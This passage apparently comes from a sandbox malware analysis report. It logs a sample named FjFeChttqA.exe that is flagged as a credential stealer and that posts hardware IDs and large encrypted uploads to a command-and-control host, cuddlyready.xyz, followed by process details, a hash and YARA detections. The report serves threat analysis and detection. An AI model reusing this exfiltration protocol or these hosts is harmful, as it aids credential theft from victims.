2024-12-23 07:35:16 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
2024-12-23 07:35:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 172.67.150.173 | 443 | 5568 | C:\Users\user\Desktop\FjFeChttqA.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:35:17 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=XIB13SBIMPZZOTJ
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 20555
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:17 UTC15331OUTData Raw: 2d 2d 58 49 42 31 33 53 42 49 4d 50 5a 5a 4f 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 42 35 34 37 37 34 37 37 34 42 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 49 42 31 33 53 42 49 4d 50 5a 5a 4f 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 49 42 31 33 53 42 49 4d 50 5a 5a 4f 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                              Data Ascii: --XIB13SBIMPZZOTJContent-Disposition: form-data; name="hwid"4DB54774774B2ACBAC8923850305D13E--XIB13SBIMPZZOTJContent-Disposition: form-data; name="pid"3--XIB13SBIMPZZOTJContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                              2024-12-23 07:35:17 UTC5224OUTData Raw: c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69
                                                                                                              Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`i
2024-12-23 07:35:18 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:18 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=0cfbinre3k5ts9274bvvjnvk87; expires=Fri, 18 Apr 2025 01:21:57 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=97QUWI0%2FETI4HSljldocsOU7pMnALQdBVle8GPWKPJBAEPK2%2BYCsJPpH0GM8R7HE6LqvvKt7%2FVpvECLX3iFOmIbWhXeWZniZu1l66%2Fs%2Fspb48AXMvfXFFflYLzIYFKFqlbY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66ac8fd94a7ce4-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1786&rtt_var=683&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21513&delivery_rate=1587819&cwnd=228&unsent_bytes=0&cid=e1a7ecffc066e9db&ts=969&x=0"
2024-12-23 07:35:18 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
2024-12-23 07:35:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49709 | 172.67.150.173 | 443 | 5568 | C:\Users\user\Desktop\FjFeChttqA.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:35:20 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=7QDMMQOYHL4WJ9T
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1243
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:20 UTC1243OUTData Raw: 2d 2d 37 51 44 4d 4d 51 4f 59 48 4c 34 57 4a 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 42 35 34 37 37 34 37 37 34 42 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 51 44 4d 4d 51 4f 59 48 4c 34 57 4a 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 51 44 4d 4d 51 4f 59 48 4c 34 57 4a 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                              Data Ascii: --7QDMMQOYHL4WJ9TContent-Disposition: form-data; name="hwid"4DB54774774B2ACBAC8923850305D13E--7QDMMQOYHL4WJ9TContent-Disposition: form-data; name="pid"1--7QDMMQOYHL4WJ9TContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
2024-12-23 07:35:20 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:20 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=hc7cbkdrvhka87561nim8m3cb1; expires=Fri, 18 Apr 2025 01:21:59 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hk3gHqoXXksBLf39KzIIh7VWWdDssklV234qocC7Pno3oRtJVeGo%2BgOIdeK%2B6PdhQCoCNXyRg2vgbvJ3rYiLtpYjGWG%2Bw2EhoYCLq6V80a47jhDHYKkZ02n7isnIAJe%2Fk7Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66aca0fd5d183d-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1503&min_rtt=1502&rtt_var=566&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2156&delivery_rate=1928665&cwnd=252&unsent_bytes=0&cid=92bae555987d6414&ts=687&x=0"
2024-12-23 07:35:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
2024-12-23 07:35:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49711 | 172.67.150.173 | 443 | 5568 | C:\Users\user\Desktop\FjFeChttqA.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:35:22 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=8CDCBNTIAV9KNB81
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 570768
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 2d 2d 38 43 44 43 42 4e 54 49 41 56 39 4b 4e 42 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 42 35 34 37 37 34 37 37 34 42 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 43 44 43 42 4e 54 49 41 56 39 4b 4e 42 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 43 44 43 42 4e 54 49 41 56 39 4b 4e 42 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                              Data Ascii: --8CDCBNTIAV9KNB81Content-Disposition: form-data; name="hwid"4DB54774774B2ACBAC8923850305D13E--8CDCBNTIAV9KNB81Content-Disposition: form-data; name="pid"1--8CDCBNTIAV9KNB81Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 84 fe c0 02 4d 72 02 68 56 18 b8 0c 02 7f 95 56 0c 22 c1 0b 7b a9 da d9 56 62 75 ed ad 19 8b 74 7f de df 2f 04 c1 c7 df 95 e5 af d4 60 9c 87 07 f5 bc 25 7f c6 f8 7f 21 35 e9 cb 9e 9d 08 93 d2 fe 97 df fd 47 aa fd bc 7e b9 3f f7 e7 07 7a 55 78 20 bb 22 4d 77 16 5d 61 25 17 59 8d 3b ff 03 28 4d 8f ff df ed 26 ff f7 01 1e a2 03 70 66 8a 02 ad 04 42 bf 21 2c d8 f8 a0 7d 34 a3 26 13 14 c6 3b 89 5e 68 e8 b7 0b c9 7e cc fd 19 23 84 f4 a7 b2 5e a7 ed 08 00 a9 46 5a 30 3c 3e d8 0b 76 c6 40 8f bd 21 7d 57 f6 9e 9e e6 60 8c 3b ad 51 1e 77 7c d5 59 0e 75 b9 c2 b9 63 b7 6d de 02 6a 89 94 80 70 fb a8 44 61 a6 af 79 ec a1 76 4e 24 1d 9d c4 f5 ba 97 22 7a 84 73 bd 1d 05 81 df af 4c 27 f7 d3 1a a7 4f d1 b9 3d 3f a8 a1 ba 7d de c4 85 4d 9a e8 b9 31 b1 03 ea 82 b2 e1 df be
                                                                                                              Data Ascii: MrhVV"{Vbut/`%!5G~?zUx "Mw]a%Y;(M&pfB!,}4&;^h~#^FZ0<>v@!}W`;Qw|YucmjpDayvN$"zsL'O=?}M1
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: ff d4 2d 58 b5 76 89 c2 5e b0 df 45 0a b0 10 00 77 a8 ea e1 f2 68 80 0f 31 e1 d1 4a bc 46 8e e8 5e 86 a7 d8 5c fb 48 e2 cf 94 2a 1b 51 99 79 1d ea 9c d5 08 36 47 71 d9 df 68 3b 37 84 3a 6f e8 87 a0 ef 12 7c 52 1d 2b d5 b0 f0 cb 88 f1 cc be 24 3c fb 79 85 bf 85 36 48 2b 0d b3 44 d0 f2 0a 11 80 ad 87 dd 19 14 66 3d 00 74 2b 83 ff 4d b2 73 c0 d2 0f 90 59 08 72 bf a4 1c 3c db 44 11 e4 ba 3d c9 ff 6f df 76 f9 54 f1 64 73 05 48 00 48 22 ef f9 dc e7 89 03 91 5d 1a 32 28 48 80 f5 41 5c 74 52 a4 03 38 ef 84 b3 14 47 a4 1d a0 43 a1 17 c0 c0 e3 6a a6 47 b1 45 c1 ab e6 fc 4b a7 ee cd c3 2e 18 ac c9 b6 dd 95 dd 57 10 37 d4 65 c0 03 cc d2 bd d1 c2 34 87 6c 54 b7 19 1c 13 34 1b 91 9e 32 a4 ed a8 62 2c e3 a3 de 7c 57 4d e8 38 5e e2 23 6e 08 1e 7c 98 89 7a ad 54 ac 47 29
                                                                                                              Data Ascii: -Xv^Ewh1JF^\H*Qy6Gqh;7:o|R+$<y6H+Df=t+MsYr<D=ovTdsHH"]2(HA\tR8GCjGEK.W7e4lT42b,|WM8^#n|zTG)
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 91 71 ed df 65 a0 6e 3b 87 8f 7c 54 5e cf 72 49 88 ff a5 81 d4 f0 19 44 c7 28 74 67 68 98 ad fe 92 b7 e3 25 5c 99 48 9d 48 b3 ac 51 4f 09 77 e9 74 1d bb b4 95 ec 2b d2 8e d1 f8 d3 87 25 76 73 3c 15 c4 8e a4 a6 b1 3c 6a 77 a7 7b 38 3b 45 ec 10 d9 b4 50 41 be aa 15 b9 7a 86 ae 8a da b1 27 35 31 59 9d 35 31 33 5f cd ca 64 90 27 1a d2 ff e2 c2 87 50 fd 89 df b6 ec 07 19 e9 32 e1 97 cb 04 ea 2b b7 98 eb 23 63 31 33 fc d4 76 c2 d7 86 b3 5f 37 3b be 68 ec bb 25 49 4b 5d 7a 95 96 1e 62 86 40 40 50 4c ac 4c 81 0d e2 c2 b5 05 14 39 0c 82 98 32 e0 2a 56 57 12 22 6a 69 14 a8 3f 34 b9 7e 7e d4 74 cf 51 d0 cb 8f 51 4d e5 98 e7 83 0c 0a f5 f2 0f d3 8a f0 af fa 39 a5 7f fa 1a ea dc fe 20 0f ba ea b0 1f d6 b3 9e ed 79 2f 06 2c af 00 4b 4c d9 47 40 95 5c 77 77 3d 90 a1 06
                                                                                                              Data Ascii: qen;|T^rID(tgh%\HHQOwt+%vs<<jw{8;EPAz'51Y513_d'P2+#c13v_7;h%IK]zb@@PLL92*VW"ji?4~~tQQM9 y/,KLG@\ww=
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 74 8a 8f 7a bd 01 89 8b 78 03 c1 76 44 d5 67 29 72 66 48 5c 57 ab 2d 17 e0 e1 94 99 83 e4 9c 2a a9 5e de 35 76 90 02 1d 45 d1 fd f0 2a 21 1e 2f c3 57 92 87 af 33 a4 09 74 dd cc f7 67 46 5f 8d 36 63 c2 0a 6f ab 5c 7c 54 12 f1 19 ad 3b 39 8b cc 29 82 0b ff e0 43 a0 cb dd 3c 54 6c 6b 46 95 80 20 34 86 29 47 47 a0 c8 aa 88 9f 37 0b cc 03 8e 97 9c d6 68 0e f1 5b 8f b6 27 b7 da 74 7f 81 08 e8 fb e2 a0 e3 57 f6 1a 50 8e a6 dc 6b 75 75 a2 ad 74 ea 6a b8 6d f5 4d ab 3b 2b 98 a4 d7 e1 5b 78 a3 74 65 60 ab e2 5f 0a 61 40 20 17 b4 6b 83 81 e2 07 5d 33 dc 4d 0a ce 0a 40 7e 74 64 d0 46 e1 7b 0b 47 e9 d0 9b 7a ab 81 70 cf bf 93 19 f6 85 96 fc 1c 3b 70 fd 34 01 8b 76 5d e1 86 14 1c 48 80 14 8b 10 e1 47 ec fc dc 8f c1 60 6e c2 b5 05 75 68 29 2c 34 32 32 88 1c ee b7 a9 d9
                                                                                                              Data Ascii: tzxvDg)rfH\W-*^5vE*!/W3tgF_6co\|T;9)C<TlkF 4)GG7h['tWPkuutjmM;+[xte`_a@ k]3M@~tdF{Gzp;p4v]HG`nuh),422
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 06 bc 9d a3 82 af 3d 1a d5 18 20 71 f0 09 43 72 cd 5a 7f 9b 91 5d 02 71 94 f3 2c 35 ce 47 9a f1 ad 6d d4 d6 d4 2c b5 05 b5 4c b3 73 82 97 d2 a3 d2 05 26 1f 31 7e 56 23 fa ff 2c a5 2f a6 d2 ca 35 de 51 25 b4 94 6d eb 91 6d 56 67 a4 a2 e8 1a 25 f1 2b 8e fe b8 65 c5 3e d1 ca 4a 31 5b 69 20 21 5b 44 24 59 fa ed c4 d7 8f 85 2d bc 92 9f 8a 61 c0 ae d5 bc f5 ed 5e fa 2d ee 0b c7 c6 da 30 c6 f4 d6 b7 4a 78 1a d7 a1 0f 3b 71 3c 94 59 55 12 0f e5 ef ab 92 f8 1a 22 be b3 3f ff 29 54 67 ec 8c ab 7b df 4b f0 25 1d f5 dd ea 76 73 4e 93 7c b8 26 89 62 fc dd b2 f0 2d b8 62 cb 6e 83 99 63 19 22 3e 12 77 09 5c 19 4e 44 7d 24 5f 38 3d 91 a9 8e 87 66 63 46 6d 73 6a a2 b8 ee 11 29 1c 8d f3 2c 73 08 21 64 e4 40 9e c2 66 dd 45 65 40 58 1b ec fa 79 cb 90 9d e1 be 6e 39 e4 aa 00
                                                                                                              Data Ascii: = qCrZ]q,5Gm,Ls&1~V#,/5Q%mmVg%+e>J1[i ![D$Y-a^-0Jx;q<YU"?)Tg{K%vsN|&b-bnc">w\ND}$_8=fcFmsj),s!d@fEe@Xyn9
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 34 d9 2c 99 a4 46 dd b4 78 b4 3a 3f 30 b3 ba 5d 5e b3 dd a7 9a c0 e8 e6 e6 33 44 3b ab 43 6e e0 80 59 b2 a1 a0 d8 0b 31 f0 23 2a 4b 25 6e 80 a1 05 22 a6 f6 96 9f c5 81 1d 22 28 d9 c0 ab 2d d9 c7 4d 65 ed e9 33 26 a4 bb 01 b6 95 ab d9 cb 79 fa 59 dc 15 d7 ed 97 97 21 b0 3e fb 37 ef ec 5f 44 a0 63 80 64 08 9d ee e4 9e 87 a3 09 9c c5 c7 b3 ed c4 93 23 a7 e7 28 9a b8 db 4b 6b e1 9d 92 17 ce 38 df cf b1 c0 8b 54 2e 2d df 0c e0 e7 dc 95 bb 2d 73 4c c8 ea cb 45 ad 65 67 ee d5 47 8d 9e 3a a3 9b c9 a1 83 3d 23 e8 42 eb 0b be b5 36 b9 e3 5b f2 0f 7a 16 3e 42 48 f1 1a 40 b1 c6 d7 7e 84 ec c7 c6 5a ea 34 30 0c ed 5a 01 db d0 59 e4 7f 97 20 c6 bb ec 5c 76 a4 8a 34 3c 96 d1 84 fb 1f e8 62 02 26 7e a4 e6 8c 13 7c 07 64 05 83 4b bb 91 80 20 da 1c b4 35 c6 a8 03 7e 7d 60
                                                                                                              Data Ascii: 4,Fx:?0]^3D;CnY1#*K%n""(-Me3&yY!>7_Dcd#(Kk8T.--sLEegG:=#B6[z>BH@~Z40ZY \v4<b&~|dK 5~}`
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 0b f0 69 cf 3f 43 f2 96 bf 0b 13 99 68 58 00 c3 bf 28 83 ee 9a 98 9c 77 63 d9 0e c4 e8 2b 69 41 26 e2 7d a5 d3 e7 1b 5c 95 b3 e7 27 d2 4d 1c 14 2f 2b 3f d7 9f 57 eb 70 4b b0 ad 57 92 8f d0 bd 2c 9c c4 d3 84 fc 42 1b 09 db 5b 4e bb 4c 5a 26 8e 84 f7 e3 83 dc a1 ec ca 55 b5 f2 9f d8 e2 c7 91 63 f7 cd f4 23 78 a0 37 43 dd 23 23 aa f4 af 44 6e 66 50 e9 33 bf 3f 25 de df 22 33 54 83 de 48 92 e9 bd e2 82 dd bf 33 6d 25 de 9f 2e af a4 a7 08 92 7d 4e ff fe 73 37 04 04 3b fb f9 30 e0 91 72 e6 63 57 64 76 22 f5 f6 bc 26 bb 46 9c eb e9 5f f6 a4 ce bb e2 06 4f cb 61 f5 e8 2b 7d cb 63 a6 90 dd 71 77 fb eb dc 7f bf 57 3c 8e d2 e8 96 ac 13 84 f7 72 bc 19 2c 0c ee d6 aa 78 38 fe fc 56 76 98 71 a4 84 3e 6a b5 b6 16 69 33 e7 d6 7c 27 6f 2d 07 91 89 00 23 0b ed 18 4d 7f cf
                                                                                                              Data Ascii: i?ChX(wc+iA&}\'M/+?WpKW,B[NLZ&Uc#x7C##DnfP3?%"3TH3m%.}Ns7;0rcWdv"&F_Oa+}cqwW<r,x8Vvq>ji3|'o-#M
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: e6 61 dd 10 eb a3 6b 7d 37 36 6b 34 f3 f8 03 5d 8f af 36 da c6 8e 32 1e 28 ca b7 d5 10 3d c6 0e e3 a2 55 bb 00 77 72 3e ea 24 1e 2e ba dd 31 57 cf b6 70 cf 4e c4 1d d8 29 8f 30 5f 61 5e e3 41 54 15 b2 f2 e5 cf 71 d2 48 29 84 c4 71 e1 2f e3 74 fd 13 c7 45 34 1c 61 d9 b9 ab 63 b6 11 84 d1 5a 01 ee 2d 60 f3 d5 58 02 20 38 6f 46 ad d1 16 04 d8 c5 5b 24 fb 78 e4 ef b5 93 b6 d9 e8 98 b5 70 3b b3 fa bb 18 4a da 06 26 66 7c 48 17 a3 d5 8a 48 48 22 b6 32 91 2c e4 ec cf bf 71 f2 c3 7c 1f bf 93 8f c7 46 99 51 98 cf c4 19 e7 b0 79 84 e2 b2 ad 44 e5 a5 af 93 9a ed 8d ab 8a 3a af 76 50 51 11 b7 a5 08 7d e1 ef 0e e3 3d 01 ec 2f 72 e8 68 2b 73 4a bf ed 67 2b e9 c9 2e 99 fb e6 2a 93 e7 7a 72 c9 1d 95 9c 8f c7 74 69 24 df 2d d1 cd 37 07 3a 14 f5 94 f0 89 f5 69 0a 76 18 c2
                                                                                                              Data Ascii: ak}76k4]62(=Uwr>$.1WpN)0_a^ATqH)q/tE4acZ-`X 8oF[$xp;J&f|HHH"2,q|FQyD:vPQ}=/rh+sJg+.*zrti$-7:iv
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: e4 c7 ad 5c 84 fe 77 dc 22 af cc fa 88 c7 bf bd b5 fe 6d 73 e9 e7 2e c0 5b 6d 02 90 b0 00 f3 ce 3d ee c5 01 8b d9 54 46 91 e8 70 d6 05 b3 17 f5 80 5a 92 44 ad 16 03 37 76 da e5 d4 7b 79 35 f0 8c c9 0e 5d 0c 78 de 29 26 9f 53 3d cd 71 7b d2 5c 7c 84 73 e3 7b ac 14 bc 97 75 20 35 46 02 e0 3b 70 0c 1c 01 df 8d 82 65 b7 be 68 7f 69 e1 65 3a d3 88 e8 72 67 8b 4b 16 28 58 37 b6 53 b8 25 4f f3 18 b0 b4 c8 6e a8 57 59 0b 49 6e 41 12 cb 51 aa 3d 6e 48 2d 65 a5 3e aa 3a 4b 55 5e e8 fe a2 0b 82 54 c9 01 5b 12 e0 c3 ba 99 a0 a1 cc d4 ab 62 be 3c cc 62 e6 f1 e8 8d 53 6f b0 57 86 1a d0 ba 5b f4 90 fe 1e 93 fc 73 25 9a 49 70 84 14 e8 6d c0 03 62 3e 40 89 57 1f a0 2b d1 94 92 4d 14 6f 6a 33 f7 46 19 09 82 55 7b b7 7a 3b 24 4b 70 8b 42 6c 30 36 0f df b1 b5 6b d6 8c 95 2a
                                                                                                              Data Ascii: \w"ms.[m=TFpZD7v{y5]x)&S=q{\|s{u 5F;pehie:rgK(X7S%OnWYInAQ=nH-e>:KU^T[b<bSoW[s%Ipmb>@W+Moj3FU{z;$KpBl06k*
2024-12-23 07:35:26 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:26 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=bs6vvkg98rojafu86n0dph06vp; expires=Fri, 18 Apr 2025 01:22:03 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gp5tdpKbRV6TanEPIb6vZmUbdFjnYL2TOMHOetyrDI%2BenvK6mQecG9NrzJnLsJc51JgrloqJuAwWI5t7SAhKwrZmtNPP26ylSu5G1XbUOrdNkMs8%2FiRm1Ncpg3vLrUlpVjA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66acb04b0fc43b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1527&rtt_var=584&sent=343&recv=594&lost=0&retrans=0&sent_bytes=2836&recv_bytes=573312&delivery_rate=1912246&cwnd=194&unsent_bytes=0&cid=bea837eb036e9826&ts=3754&x=0"


                                                                                                              Target ID:0
                                                                                                              Start time:02:35:04
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Users\user\Desktop\FjFeChttqA.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\FjFeChttqA.exe"
                                                                                                              Imagebase:0xfa0000
                                                                                                              File size:2'953'728 bytes
                                                                                                              MD5 hash:E21681EF00EBFAEE22CD2137A1349DE0
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2201737747.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2181449137.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2180512483.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2180442038.0000000001923000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2201681034.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2180512483.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, Offset: 018B8000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
